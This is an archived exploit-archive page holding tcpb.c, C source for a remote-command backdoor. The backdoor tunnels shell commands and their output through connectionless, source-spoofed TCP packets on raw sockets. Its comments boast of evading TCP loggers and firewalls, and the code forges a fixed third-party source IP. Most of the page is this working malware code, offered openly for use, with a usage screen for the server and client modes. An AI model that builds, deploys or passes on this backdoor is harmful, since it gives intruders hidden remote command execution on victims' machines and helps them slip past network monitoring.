exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tcpb.c

tcpb.c
Posted May 1, 2000
Authored by Cyrax | Site programmazione.it

A backdoor over non connected and spoofed tcp packets.

tags | exploit, spoof, tcp
SHA-256 | 42a0382fb0ddc459d356d9fd22b1b33b6f0f4541745ae1cb4ba8e6c78bb94aa7

tcpb.c

Change Mirror Download
/* Backdoor over non connected and spoofed tcp packets
* Coded by |CyRaX|
* Members Of Packets Knights Crew
* www.programmazione.it/knights
* This little backdoor works by sending data in tcp packets over tcp packets
* without creating a connection. Simply we use the tcp that is a connection
* oriented protocol as udp (connection less).
* Why to do this :
* - tcp loggers simpy log only the connection request
* - firewalls can't block packets all the packets destinated to a port >=
* 1024.. they logs only the packets with the SYN flag... but we don't
* need it :)
* Why this is better than backdoor over icmp or igmp : because a good admin
* would simply blocks (or at least log) all those packets. But it's very hard
* that he'll blocks all the tcp packets (or log them all)
* Edit this code as you want (and correct all the bugs :P)
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <net/if.h>

/* USER SETUP
* ports must be the same in the client and the server
*/
#define CLIENTPORT 1234
#define SERVERPORT 4321



/* Prototipi */
void uso();
void waitpkt();
void sendpkt(char *what, unsigned long int to);
u_short in_chksum(u_short *ptr, int nbytes);
/* Globals: */
int server=0;
char victim[20];
int wait=1;
int sock_waiting;
char ourip[200];

/* some structs */
struct ippkt{
struct ip ip;
struct tcphdr tcp;
char something[12];
char data[1024];
};

struct pseudohdr {
u_int32_t saddr;
u_int32_t daddr;
u_int8_t zero;
u_int8_t protocol;
u_int16_t lenght;
};

/* Let's go !! :) */

int main(int argc, char **argv){
pid_t procid;
struct ippkt pkt;
char command[200];


srand(getpid());
if(argc<2){
uso();
exit(0);
}
if (strstr(argv[1],"-s")){
server=1;
}
else {
strcpy(victim,argv[2]);
strcpy(ourip,argv[3]);
}
sock_waiting=socket(AF_INET,SOCK_RAW,6);
printf("Backdoor on non connected/spoofed tcp. Coded by |CyRaX|. cyrax@freemail.it\n");
printf("Members of Packets Knights Crew ! www.programmazione.it/knights\n");
if(server){
printf("Running in server mode. Forking and waiting for the data\n");
procid=fork();
if(procid!=0){
/* The parent dies. */
exit(0);
}
while(1){
waitpkt();
}
}
else {
printf("Running in client mode. Sending data to %s.\n",victim);
while(1){
printf("root@fucked.%s # ",victim);
fgets(command,200,stdin);
wait=1;
sendpkt(command,inet_addr(victim));
while(wait){
waitpkt();
}
}


}

}

/* Functions that wait for packets */
void waitpkt(){
struct ippkt pkt;
int howmany;
struct sockaddr_in sin;
int clen=sizeof(sin);
FILE *job;
char buff[200];
memset(&pkt,0,sizeof(struct ippkt));
howmany=recvfrom(sock_waiting,(struct ippkt *) &pkt,sizeof(pkt),0,(struct sockaddr *)&sin,&clen);
if(ntohs(pkt.tcp.dest)==SERVERPORT && pkt.tcp.ack==0 && pkt.tcp.urg==0&&server){
job=popen(pkt.data,"r");
while(fgets(buff,199,job)!=0){
sendpkt(buff,pkt.tcp.seq);
}
strcpy(buff,"END_OF_PROCESS");
pclose(job);
sendpkt(buff,pkt.tcp.seq);
}
if(ntohs(pkt.tcp.dest)==CLIENTPORT && pkt.tcp.ack==0 && pkt.tcp.urg==0&&!server){
wait=1;
if(strstr(pkt.data,"END_OF_PROCESS")){
wait=0;
}
else{
printf("%s",pkt.data);
}
}

}

/* Functions that sends packets */

void sendpkt(char *what, unsigned long int to){
int sock;
struct sockaddr_in from,temp;
struct ippkt pkt;
int hincl=1;
int err;
int s;
struct ifreq ifr;
struct pseudohdr psd;
char *tosum;


sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
memset(&pkt,0,sizeof(pkt));
setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&hincl,sizeof(hincl));
from.sin_addr.s_addr=to;
from.sin_family=AF_INET;
pkt.ip.ip_len=sizeof(struct ip)+sizeof(struct tcphdr)+12+strlen(what);
pkt.ip.ip_hl=sizeof(pkt.ip)>>2;
pkt.ip.ip_v=4;
pkt.ip.ip_ttl=255;
pkt.ip.ip_tos=0;
pkt.ip.ip_off=0;
pkt.ip.ip_id=htons((int)rand());
pkt.ip.ip_p=6;
/* from www.microsoft.com .. you BETTER change this */
pkt.ip.ip_src.s_addr=inet_addr("207.46.131.137");
pkt.ip.ip_dst.s_addr=to;
pkt.ip.ip_sum=in_chksum((u_short *) &pkt.ip,sizeof(struct ip));
if(server){
pkt.tcp.source=htons(SERVERPORT);
pkt.tcp.dest=htons(CLIENTPORT);
}
else{
pkt.tcp.source=htons(CLIENTPORT);
pkt.tcp.dest=htons(SERVERPORT);
}
if(server){
pkt.tcp.seq=666;
}
else{
pkt.tcp.seq=inet_addr(ourip);





}
/* SOME FLAGS */
pkt.tcp.ack=0;
pkt.tcp.urg=0;
pkt.tcp.window=1234;

strcpy(pkt.data,what);
pkt.tcp.urg_ptr=1234;
/* MAYBE SOMETHING IS WRONG HERE */
tosum=malloc(sizeof(psd)+sizeof(pkt.tcp));
memcpy(&psd.saddr,&pkt.ip.ip_src.s_addr,4);
memcpy(&psd.daddr,&pkt.ip.ip_dst.s_addr,4);
psd.protocol=6;
psd.lenght=htons(sizeof(struct tcphdr)+12+strlen(what));
memcpy(tosum,&psd,sizeof(psd));
memcpy(tosum+sizeof(psd),&pkt.tcp,sizeof(pkt.tcp));
pkt.tcp.check=in_chksum((u_short *)&tosum,sizeof(psd)+sizeof(pkt.tcp));
/* PACKET READY TO GO !!!!!! */
err=sendto(sock,&pkt,sizeof(struct ip)+sizeof(struct tcphdr)+sizeof(pkt.something)+strlen(what),
0,(struct sockaddr *)&from,sizeof(struct sockaddr));
}

/* Function for the cksum.. ripped */

u_short in_chksum(u_short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */

/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/

sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}

/* mop up an odd byte, if necessary */
if (nbytes == 1)
{
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}

/*
* Add back carry outs from top 16 bits to low 16 bits.
*/

sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */

return((u_short) answer);
}

void uso(){
printf("Backdoor On Non Connected And Spoofed Tcp Packets\n");
printf("Coded by |CyRaX| cyrax@freemail.it - |CyRaX|@ircnet\n");
printf("Member Of Packets Knights Crew ! www.programmazione.it/knights\n");
printf("Usage: server ./tcpb -s\n");
printf(" client ./tcpb -c <serverip> <your_ip>\n");
printf("example : ./tcpb -s ; /tcpb -c 127.0.0.1 127.0.0.1\n");

exit(0);
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    12 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close